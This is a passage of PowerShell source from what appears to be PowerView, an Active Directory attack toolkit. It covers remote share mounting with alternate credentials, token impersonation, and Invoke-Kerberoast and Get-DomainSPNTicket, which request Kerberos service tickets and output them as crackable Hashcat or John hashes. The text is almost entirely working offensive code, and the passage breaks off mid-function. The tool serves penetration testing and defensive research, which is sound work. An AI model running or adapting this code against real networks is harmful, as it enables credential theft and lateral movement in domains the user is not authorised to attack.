isn't\nspecified, a -ComputerName is required to pseudo-mount IPC$.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: PSReflect  \n\n.DESCRIPTION\n\nThis function uses WNetAddConnection2W to make a 'temporary' (i.e. not saved) connection\nto the specified remote -Path (\\\\UNC\\share) with the alternate credentials specified in the\n-Credential object. If a -Path isn't specified, a -ComputerName is required to pseudo-mount IPC$.\n\nTo destroy the connection, use Remove-RemoteConnection with the same specified \\\\UNC\\share path\nor -ComputerName.\n\n.PARAMETER ComputerName\n\nSpecifies the system to add a \\\\ComputerName\\IPC$ connection for.\n\n.PARAMETER Path\n\nSpecifies the remote \\\\UNC\\path to add the connection for.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the remote system.\n\n.EXAMPLE\n\n$Cred = Get-Credential\nAdd-RemoteConnection -ComputerName 'PRIMARY.testlab.local' -Credential $Cred\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nAdd-RemoteConnection -Path '\\\\PRIMARY.testlab.local\\C$\\' -Credential $Cred\n\n.EXAMPLE\n\n$Cred = Get-Credential\n@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Add-RemoteConnection  -Credential $Cred\n#>\n\n    [CmdletBinding(DefaultParameterSetName = 'ComputerName')]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ComputerName', ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('HostName', 'dnshostname', 'name')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $ComputerName,\n\n        [Parameter(Position = 0, ParameterSetName = 'Path', Mandatory = $True)]\n        [ValidatePattern('\\\\\\\\.*\\\\.*')]\n        [String[]]\n        $Path,\n\n        [Parameter(Mandatory = $True)]\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential\n    )\n\n    BEGIN {\n        $NetResourceInstance = [Activator]::CreateInstance($NETRESOURCEW)\n        $NetResourceInstance.dwType = 1\n    }\n\n    PROCESS {\n        $Paths = @()\n        if ($PSBoundParameters['ComputerName']) {\n            ForEach ($TargetComputerName in $ComputerName) {\n                $TargetComputerName = $TargetComputerName.Trim('\\')\n                $Paths += ,\"\\\\$TargetComputerName\\IPC$\"\n            }\n        }\n        else {\n            $Paths += ,$Path\n        }\n\n        ForEach ($TargetPath in $Paths) {\n            $NetResourceInstance.lpRemoteName = $TargetPath\n            Write-Verbose \"[Add-RemoteConnection] Attempting to mount: $TargetPath\"\n\n            # https://msdn.microsoft.com/en-us/library/windows/desktop/aa385413(v=vs.85).aspx\n            #   CONNECT_TEMPORARY = 4\n            $Result = $Mpr::WNetAddConnection2W($NetResourceInstance, $Credential.GetNetworkCredential().Password, $Credential.UserName, 4)\n\n            if ($Result -eq 0) {\n                Write-Verbose \"$TargetPath successfully mounted\"\n            }\n            else {\n                Throw \"[Add-RemoteConnection] error mounting $TargetPath : $(([ComponentModel.Win32Exception]$Result).Message)\"\n            }\n        }\n    }\n}\n\n\nfunction Remove-RemoteConnection {\n<#\n.SYNOPSIS\n\nDestroys a connection created by New-RemoteConnection.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: PSReflect  \n\n.DESCRIPTION\n\nThis function uses WNetCancelConnection2 to destroy a connection created by\nNew-RemoteConnection. If a -Path isn't specified, a -ComputerName is required to\n'unmount' \\\\$ComputerName\\IPC$.\n\n.PARAMETER ComputerName\n\nSpecifies the system to remove a \\\\ComputerName\\IPC$ connection for.\n\n.PARAMETER Path\n\nSpecifies the remote \\\\UNC\\path to remove the connection for.\n\n.EXAMPLE\n\nRemove-RemoteConnection -ComputerName 'PRIMARY.testlab.local'\n\n.EXAMPLE\n\nRemove-RemoteConnection -Path '\\\\PRIMARY.testlab.local\\C$\\'\n\n.EXAMPLE\n\n@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Remove-RemoteConnection\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]\n    [CmdletBinding(DefaultParameterSetName = 'ComputerName')]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ComputerName', ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('HostName', 'dnshostname', 'name')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $ComputerName,\n\n        [Parameter(Position = 0, ParameterSetName = 'Path', Mandatory = $True)]\n        [ValidatePattern('\\\\\\\\.*\\\\.*')]\n        [String[]]\n        $Path\n    )\n\n    PROCESS {\n        $Paths = @()\n        if ($PSBoundParameters['ComputerName']) {\n            ForEach ($TargetComputerName in $ComputerName) {\n                $TargetComputerName = $TargetComputerName.Trim('\\')\n                $Paths += ,\"\\\\$TargetComputerName\\IPC$\"\n            }\n        }\n        else {\n            $Paths += ,$Path\n        }\n\n        ForEach ($TargetPath in $Paths) {\n            Write-Verbose \"[Remove-RemoteConnection] Attempting to unmount: $TargetPath\"\n            $Result = $Mpr::WNetCancelConnection2($TargetPath, 0, $True)\n\n            if ($Result -eq 0) {\n                Write-Verbose \"$TargetPath successfully ummounted\"\n            }\n            else {\n                Throw \"[Remove-RemoteConnection] error unmounting $TargetPath : $(([ComponentModel.Win32Exception]$Result).Message)\"\n            }\n        }\n    }\n}\n\n\nfunction Invoke-UserImpersonation {\n<#\n.SYNOPSIS\n\nCreates a new \"runas /netonly\" type logon and impersonates the token.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: PSReflect  \n\n.DESCRIPTION\n\nThis function uses LogonUser() with the LOGON32_LOGON_NEW_CREDENTIALS LogonType\nto simulate \"runas /netonly\". The resulting token is then impersonated with\nImpersonateLoggedOnUser() and the token handle is returned for later usage\nwith Invoke-RevertToSelf.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object with alternate credentials\nto impersonate in the current thread space.\n\n.PARAMETER TokenHandle\n\nAn IntPtr TokenHandle returned by a previous Invoke-UserImpersonation.\nIf this is supplied, LogonUser() is skipped and only ImpersonateLoggedOnUser()\nis executed.\n\n.PARAMETER Quiet\n\nSuppress any warnings about STA vs MTA.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nInvoke-UserImpersonation -Credential $Cred\n\n.OUTPUTS\n\nIntPtr\n\nThe TokenHandle result from LogonUser.\n#>\n\n    [OutputType([IntPtr])]\n    [CmdletBinding(DefaultParameterSetName = 'Credential')]\n    Param(\n        [Parameter(Mandatory = $True, ParameterSetName = 'Credential')]\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential,\n\n        [Parameter(Mandatory = $True, ParameterSetName = 'TokenHandle')]\n        [ValidateNotNull()]\n        [IntPtr]\n        $TokenHandle,\n\n        [Switch]\n        $Quiet\n    )\n\n    if (([System.Threading.Thread]::CurrentThread.GetApartmentState() -ne 'STA') -and (-not $PSBoundParameters['Quiet'])) {\n        Write-Warning \"[Invoke-UserImpersonation] powershell.exe is not currently in a single-threaded apartment state, token impersonation may not work.\"\n    }\n\n    if ($PSBoundParameters['TokenHandle']) {\n        $LogonTokenHandle = $TokenHandle\n    }\n    else {\n        $LogonTokenHandle = [IntPtr]::Zero\n        $NetworkCredential = $Credential.GetNetworkCredential()\n        $UserDomain = $NetworkCredential.Domain\n        $UserName = $NetworkCredential.UserName\n        Write-Warning \"[Invoke-UserImpersonation] Executing LogonUser() with user: $($UserDomain)\\$($UserName)\"\n\n        # LOGON32_LOGON_NEW_CREDENTIALS = 9, LOGON32_PROVIDER_WINNT50 = 3\n        #   this is to simulate \"runas.exe /netonly\" functionality\n        $Result = $Advapi32::LogonUser($UserName, $UserDomain, $NetworkCredential.Password, 9, 3, [ref]$LogonTokenHandle);$LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error();\n\n        if (-not $Result) {\n            throw \"[Invoke-UserImpersonation] LogonUser() Error: $(([ComponentModel.Win32Exception] $LastError).Message)\"\n        }\n    }\n\n    # actually impersonate the token from LogonUser()\n    $Result = $Advapi32::ImpersonateLoggedOnUser($LogonTokenHandle)\n\n    if (-not $Result) {\n        throw \"[Invoke-UserImpersonation] ImpersonateLoggedOnUser() Error: $(([ComponentModel.Win32Exception] $LastError).Message)\"\n    }\n\n    Write-Verbose \"[Invoke-UserImpersonation] Alternate credentials successfully impersonated\"\n    $LogonTokenHandle\n}\n\n\nfunction Invoke-RevertToSelf {\n<#\n.SYNOPSIS\n\nReverts any token impersonation.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: PSReflect  \n\n.DESCRIPTION\n\nThis function uses RevertToSelf() to revert any impersonated tokens.\nIf -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation),\nCloseHandle() is used to close the opened handle.\n\n.PARAMETER TokenHandle\n\nAn optional IntPtr TokenHandle returned by Invoke-UserImpersonation.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\n$Token = Invoke-UserImpersonation -Credential $Cred\nInvoke-RevertToSelf -TokenHandle $Token\n#>\n\n    [CmdletBinding()]\n    Param(\n        [ValidateNotNull()]\n        [IntPtr]\n        $TokenHandle\n    )\n\n    if ($PSBoundParameters['TokenHandle']) {\n        Write-Warning \"[Invoke-RevertToSelf] Reverting token impersonation and closing LogonUser() token handle\"\n        $Result = $Kernel32::CloseHandle($TokenHandle)\n    }\n\n    $Result = $Advapi32::RevertToSelf();$LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error();\n\n    if (-not $Result) {\n        throw \"[Invoke-RevertToSelf] RevertToSelf() Error: $(([ComponentModel.Win32Exception] $LastError).Message)\"\n    }\n\n    Write-Verbose \"[Invoke-RevertToSelf] Token impersonation successfully reverted\"\n}\n\n\nfunction Get-DomainSPNTicket {\n<#\n.SYNOPSIS\n\nRequest the kerberos ticket for a specified service principal name (SPN).\n\nAuthor: machosec, Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf  \n\n.DESCRIPTION\n\nThis function will either take one/more SPN strings, or one/more PowerView.User objects\n(the output from Get-DomainUser) and will request a kerberos ticket for the given SPN\nusing System.IdentityModel.Tokens.KerberosRequestorSecurityToken. The encrypted\nportion of the ticket is then extracted and output in either crackable John or Hashcat\nformat (deafult of Hashcat).\n\n.PARAMETER SPN\n\nSpecifies the service principal name to request the ticket for.\n\n.PARAMETER User\n\nSpecifies a PowerView.User object (result of Get-DomainUser) to request the ticket for.\n\n.PARAMETER OutputFormat\n\nEither 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.\nDefaults to 'John'.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the remote domain using Invoke-UserImpersonation.\n\n.EXAMPLE\n\nGet-DomainSPNTicket -SPN \"HTTP/web.testlab.local\"\n\nRequest a kerberos service ticket for the specified SPN.\n\n.EXAMPLE\n\n\"HTTP/web1.testlab.local\",\"HTTP/web2.testlab.local\" | Get-DomainSPNTicket\n\nRequest kerberos service tickets for all SPNs passed on the pipeline.\n\n.EXAMPLE\n\nGet-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat JTR\n\nRequest kerberos service tickets for all users with non-null SPNs and output in JTR format.\n\n.INPUTS\n\nString\n\nAccepts one or more SPN strings on the pipeline with the RawSPN parameter set.\n\n.INPUTS\n\nPowerView.User\n\nAccepts one or more PowerView.User objects on the pipeline with the User parameter set.\n\n.OUTPUTS\n\nPowerView.SPNTicket\n\nOutputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section.\n#>\n\n    [OutputType('PowerView.SPNTicket')]\n    [CmdletBinding(DefaultParameterSetName = 'RawSPN')]\n    Param (\n        [Parameter(Position = 0, ParameterSetName = 'RawSPN', Mandatory = $True, ValueFromPipeline = $True)]\n        [ValidatePattern('.*/.*')]\n        [Alias('ServicePrincipalName')]\n        [String[]]\n        $SPN,\n\n        [Parameter(Position = 0, ParameterSetName = 'User', Mandatory = $True, ValueFromPipeline = $True)]\n        [ValidateScript({ $_.PSObject.TypeNames[0] -eq 'PowerView.User' })]\n        [Object[]]\n        $User,\n\n        [ValidateSet('John', 'Hashcat')]\n        [Alias('Format')]\n        [String]\n        $OutputFormat = 'Hashcat',\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $Null = [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel')\n\n        if ($PSBoundParameters['Credential']) {\n            $LogonToken = Invoke-UserImpersonation -Credential $Credential\n        }\n    }\n\n    PROCESS {\n        if ($PSBoundParameters['User']) {\n            $TargetObject = $User\n        }\n        else {\n            $TargetObject = $SPN\n        }\n\n        ForEach ($Object in $TargetObject) {\n            if ($PSBoundParameters['User']) {\n                $UserSPN = $Object.ServicePrincipalName\n                $SamAccountName = $Object.SamAccountName\n                $DistinguishedName = $Object.DistinguishedName\n            }\n            else {\n                $UserSPN = $Object\n                $SamAccountName = 'UNKNOWN'\n                $DistinguishedName = 'UNKNOWN'\n            }\n\n            # if a user has multiple SPNs we only take the first one otherwise the service ticket request fails miserably :) -@st3r30byt3\n            if ($UserSPN -is [System.DirectoryServices.ResultPropertyValueCollection]) {\n                $UserSPN = $UserSPN[0]\n            }\n\n            try {\n                $Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN\n            }\n            catch {\n                Write-Warning \"[Get-DomainSPNTicket] Error requesting ticket for SPN '$UserSPN' from user '$DistinguishedName' : $_\"\n            }\n            if ($Ticket) {\n                $TicketByteStream = $Ticket.GetRequest()\n            }\n            if ($TicketByteStream) {\n                $Out = New-Object PSObject\n\n                $TicketHexStream = [System.BitConverter]::ToString($TicketByteStream) -replace '-'\n\n                $Out | Add-Member Noteproperty 'SamAccountName' $SamAccountName\n                $Out | Add-Member Noteproperty 'DistinguishedName' $DistinguishedName\n                $Out | Add-Member Noteproperty 'ServicePrincipalName' $Ticket.ServicePrincipalName\n\n                # TicketHexStream == GSS-API Frame (see https://tools.ietf.org/html/rfc4121#section-4.1)\n                # No easy way to parse ASN1, so we'll try some janky regex to parse the embedded KRB_AP_REQ.Ticket object\n                if($TicketHexStream -match 'a382....3082....A0030201(?<EtypeLen>..)A1.{1,4}.......A282(?<CipherTextLen>....)........(?<DataToEnd>.+)') {\n                    $Etype = [Convert]::ToByte( $Matches.EtypeLen, 16 )\n                    $CipherTextLen = [Convert]::ToUInt32($Matches.CipherTextLen, 16)-4\n                    $CipherText = $Matches.DataToEnd.Substring(0,$CipherTextLen*2)\n\n                    # Make sure the next field matches the beginning of the KRB_AP_REQ.Authenticator object\n                    if($Matches.DataToEnd.Substring($CipherTextLen*2, 4) -ne 'A482') {\n                        Write-Warning \"Error parsing ciphertext for the SPN  $($Ticket.ServicePrincipalName). Use the TicketByteHexStream field and extract the hash offline with Get-KerberoastHashFromAPReq\"\n                        $Hash = $null\n                        $Out | Add-Member Noteproperty 'TicketByteHexStream' ([Bitconverter]::ToString($TicketByteStream).Replace('-',''))\n                    } else {\n                        $Hash = \"$($CipherText.Substring(0,32))`$$($CipherText.Substring(32))\"\n                        $Out | Add-Member Noteproperty 'TicketByteHexStream' $null\n                    }\n                } else {\n                    Write-Warning \"Unable to parse ticket structure for the SPN  $($Ticket.ServicePrincipalName). Use the TicketByteHexStream field and extract the hash offline with Get-KerberoastHashFromAPReq\"\n                    $Hash = $null\n                    $Out | Add-Member Noteproperty 'TicketByteHexStream' ([Bitconverter]::ToString($TicketByteStream).Replace('-',''))\n                }\n\n                if($Hash) {\n                    # JTR jumbo output format - $krb5tgs$SPN/machine.testlab.local:63386d22d359fe...\n                    if ($OutputFormat -match 'John') {\n                        $HashFormat = \"`$krb5tgs`$$($Ticket.ServicePrincipalName):$Hash\"\n                    }\n                    else {\n                        if ($DistinguishedName -ne 'UNKNOWN') {\n                            $UserDomain = $DistinguishedName.SubString($DistinguishedName.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'\n                        }\n                        else {\n                            $UserDomain = 'UNKNOWN'\n                        }\n\n                        # hashcat output format - $krb5tgs$23$*user$realm$test/spn*$63386d22d359fe...\n                        $HashFormat = \"`$krb5tgs`$$($Etype)`$*$SamAccountName`$$UserDomain`$$($Ticket.ServicePrincipalName)*`$$Hash\"\n                    }\n                    $Out | Add-Member Noteproperty 'Hash' $HashFormat\n                }\n\n                $Out.PSObject.TypeNames.Insert(0, 'PowerView.SPNTicket')\n                $Out\n            }\n        }\n    }\n\n    END {\n        if ($LogonToken) {\n            Invoke-RevertToSelf -TokenHandle $LogonToken\n        }\n    }\n}\n\n\nfunction Invoke-Kerberoast {\n<#\n.SYNOPSIS\n\nRequests service tickets for kerberoast-able accounts and returns extracted ticket hashes.\n\nAuthor: Will Schroeder (@harmj0y), @machosec  \nLicense: BSD 3-Clause  \nRequired Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, Get-DomainUser, Get-DomainSPNTicket  \n\n.DESCRIPTION\n\nUses Get-DomainUser to query for user accounts with non-null service principle\nnames (SPNs) and uses Get-SPNTicket to request/extract the crackable ticket information.\nThe ticket format can be specified with -OutputFormat <John/Hashcat>.\n\n.PARAMETER Identity\n\nA SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).\nWildcards accepted.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER OutputFormat\n\nEither 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.\nDefaults to 'Hashcat'.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nInvoke-Kerberoast | fl\n\nKerberoasts all found SPNs for the current domain, outputting to Hashcat format (default).\n\n.EXAMPLE\n\nInvoke-Kerberoast -Domain dev.testlab.local | fl\n\nKerberoasts all found SPNs for the testlab.local domain, outputting to JTR\nformat instead of Hashcat.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -orce\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLB\\dfm.a', $SecPassword)\nInvoke-Kerberoast -Credential $Cred -Verbose -Domain testlab.local | fl\n\nKerberoasts all found SPNs for the testlab.local domain using alternate credentials.\n\n.OUTPUTS\n\nPowerView.SPNTicket\n\nOutputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.SPNTicket')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]\n        [String[]]\n        $Identity,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [ValidateSet('John', 'Hashcat')]\n        [Alias('Format')]\n        [String]\n        $OutputFormat = 'Hashcat',\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $UserSearcherArguments = @{\n            'SPN' = $True\n            'Properties' = 'samaccountname,distinguishedname,serviceprincipalname'\n        }\n        if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['LDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $LDAPFilter }\n        if ($PSBoundParameters['SearchBase']) { $UserSearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential }\n\n        if ($PSBoundParameters['Credential']) {\n            $LogonToken = Invoke-UserImpersonation -Credential $Credential\n        }\n    }\n\n    PROCESS {\n        if ($PSBoundParameters['Identity']) { $UserSearcherArguments['Identity'] = $Identity }\n        Get-DomainUser @UserSearcherArguments | Where-Object {$_.samaccountname -ne 'krbtgt'} | Get-DomainSPNTicket -OutputFormat $OutputFormat\n    }\n\n    END {\n        if ($LogonToken) {\n            Invoke-RevertToSelf -TokenHandle $LogonToken\n        }\n    }\n}\n\n\nfunction Get-PathAcl {\n<#\n.SYNOPSIS\n\nEnumerates the ACL for a given file path.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertFrom-SID  \n\n.DESCRIPTION\n\nEnumerates the ACL for a specified file/folder path, and translates\nthe access rules for each entry into readable formats. If -Credential is passed,\nAdd-RemoteConnection/Remove-RemoteConnection is used to temporarily map the remote share.\n\n.PARAMETER Path\n\nSpecifies the local or remote path to enumerate the ACLs for.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target path.\n\n.EXAMPLE\n\nGet-PathAcl \"\\\\SERVER\\Share\\\"\n\nReturns ACLs for the given UNC share.\n\n.EXAMPLE\n\ngci .\\test.txt | Get-PathAcl\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm', $SecPassword)\nGet-PathAcl -Path \"\\\\SERVER\\Share\\\" -Credential $Cred\n\n.INPUTS\n\nString\n\nOne of more paths to enumerate ACLs for.\n\n.OUTPUTS\n\nPowerView.FileACL\n\nA custom object with the full path and associated ACL entries.\n\n.LINK\n\nhttps://support.microsoft.com/en-us/kb/305144\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.FileACL')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('FullName')]\n        [String[]]\n        $Path,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n\n        function Convert-FileRight {\n            # From Ansgar Wiechers at http://stackoverflow.com/questions/28029872/retrieving-security-descriptor-and-getting-number-for-filesystemrights\n            [CmdletBinding()]\n            Param(\n                [Int]\n                $FSR\n            )\n\n            $AccessMask = @{\n                [uint32]'0x80000000' = 'GenericRead'\n                [uint32]'0x40000000' = 'GenericWrite'\n                [uint32]'0x20000000' = 'GenericExecute'\n                [uint32]'0x10000000' = 'GenericAll'\n                [uint32]'0x02000000' = 'MaximumAllowed'\n                [uint32]'0x01000000' = 'AccessSystemSecurity'\n                [uint32]'0x00100000' = 'Synchronize'\n                [uint32]'0x00080000' = 'WriteOwner'\n                [uint32]'0x00040000' = 'WriteDAC'\n                [uint32]'0x00020000' = 'ReadControl'\n                [uint32]'0x00010000' = 'Delete'\n                [uint32]'0x00000100' = 'WriteAttributes'\n                [uint32]'0x00000080' = 'ReadAttributes'\n                [uint32]'0x00000040' = 'DeleteChild'\n                [uint32]'0x00000020' = 'Execute/Traverse'\n                [uint32]'0x00000010' = 'WriteExtendedAttributes'\n                [uint32]'0x00000008' = 'ReadExtendedAttributes'\n                [uint32]'0x00000004' = 'AppendData/AddSubdirectory'\n                [uint32]'0x00000002' = 'WriteData/AddFile'\n                [uint32]'0x00000001' = 'ReadData/ListDirectory'\n            }\n\n            $SimplePermissions = @{\n                [uint32]'0x1f01ff' = 'FullControl'\n                [uint32]'0x0301bf' = 'Modify'\n                [uint32]'0x0200a9' = 'ReadAndExecute'\n                [uint32]'0x02019f' = 'ReadAndWrite'\n                [uint32]'0x020089' = 'Read'\n                [uint32]'0x000116' = 'Write'\n            }\n\n            $Permissions = @()\n\n            # get simple permission\n            $Permissions += $SimplePermissions.Keys | ForEach-Object {\n                              if (($FSR -band $_) -eq $_) {\n                                $SimplePermissions[$_]\n                                $FSR = $FSR -band (-not $_)\n                              }\n                            }\n\n            # get remaining extended permissions\n            $Permissions += $AccessMask.Keys | Where-Object { $FSR -band $_ } | ForEach-Object { $AccessMask[$_] }\n            ($Permissions | Where-Object {$_}) -join ','\n        }\n\n        $ConvertArguments = @{}\n        if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential }\n\n        $MappedComputers = @{}\n    }\n\n    PROCESS {\n        ForEach ($TargetPath in $Path) {\n            try {\n                if (($TargetPath -Match '\\\\\\\\.*\\\\.*') -and ($PSBoundParameters['Credential'])) {\n                    $HostComputer = (New-Object System.Uri($TargetPath)).Host\n                    if (-not $MappedComputers[$HostComputer]) {\n                        # map IPC$ to this computer if it's not already\n                        Add-RemoteConnection -ComputerName $HostComputer -Credential $Credential\n                        $MappedComputers[$HostComputer] = $True\n                    }\n                }\n\n                $ACL = Get-Acl -Path $TargetPath\n\n                $ACL.GetAccessRules($True, $True, [System.Security.Principal.SecurityIdentifier]) | ForEach-Object {\n                    $SID = $_.IdentityReference.Value\n                    $Name = ConvertFrom-SID -ObjectSID $SID @ConvertArguments\n\n                    $Out = New-Object PSObject\n                    $Out | Add-Member Noteproperty 'Path' $TargetPath\n                    $Out | Add-Member Noteproperty 'FileSystemRights' (Convert-FileRight -FSR $_.FileSystemRights.value__)\n                    $Out | Add-Member Noteproperty 'IdentityReference' $Name\n                    $Out | Add-Member Noteproperty 'IdentitySID' $SID\n                    $Out | Add-Member Noteproperty 'AccessControlType' $_.AccessControlType\n                    $Out.PSObject.TypeNames.Insert(0, 'PowerView.FileACL')\n                    $Out\n                }\n            }\n            catch {\n                Write-Verbose \"[Get-PathAcl] error: $_\"\n            }\n        }\n    }\n\n    END {\n        # remove the IPC$ mappings\n        $MappedComputers.Keys | Remove-RemoteConnection\n    }\n}\n\n\nfunction Convert-LDAPProperty {\n<#\n.SYNOPSIS\n\nHelper that converts specific LDAP property result fields and outputs\na custom psobject.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nConverts a set of raw LDAP properties results from ADSI/LDAP searches\ninto a proper PSObject. Used by several of the Get-Domain* function.\n\n.PARAMETER Properties\n\nProperties object to extract out LDAP fields for display.\n\n.OUTPUTS\n\nSystem.Management.Automation.PSCustomObject\n\nA custom PSObject with LDAP hashtable properties translated.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('System.Management.Automation.PSCustomObject')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $True, ValueFromPipeline = $True)]\n        [ValidateNotNullOrEmpty()]\n        $Properties\n    )\n\n    $ObjectProperties = @{}\n\n    $Properties.keys | Sort-Object | ForEach-Object {\n        if ($_ -ne 'adspath') {\n            if (($_ -eq 'objectsid') -or ($_ -eq 'sidhistory') -or ($_ -eq 'securityidentifier')) {\n                # convert all listed sids (i.e. if multiple are listed in sidHistory)\n                $ObjectProperties[$_] = $Properties[$_] | ForEach-Object { (New-Object System.Security.Principal.SecurityIdentifier($_, 0)).Value }\n            }\n            elseif ($_ -eq 'grouptype') {\n                $ObjectProperties[$_] = $Properties[$_][0] 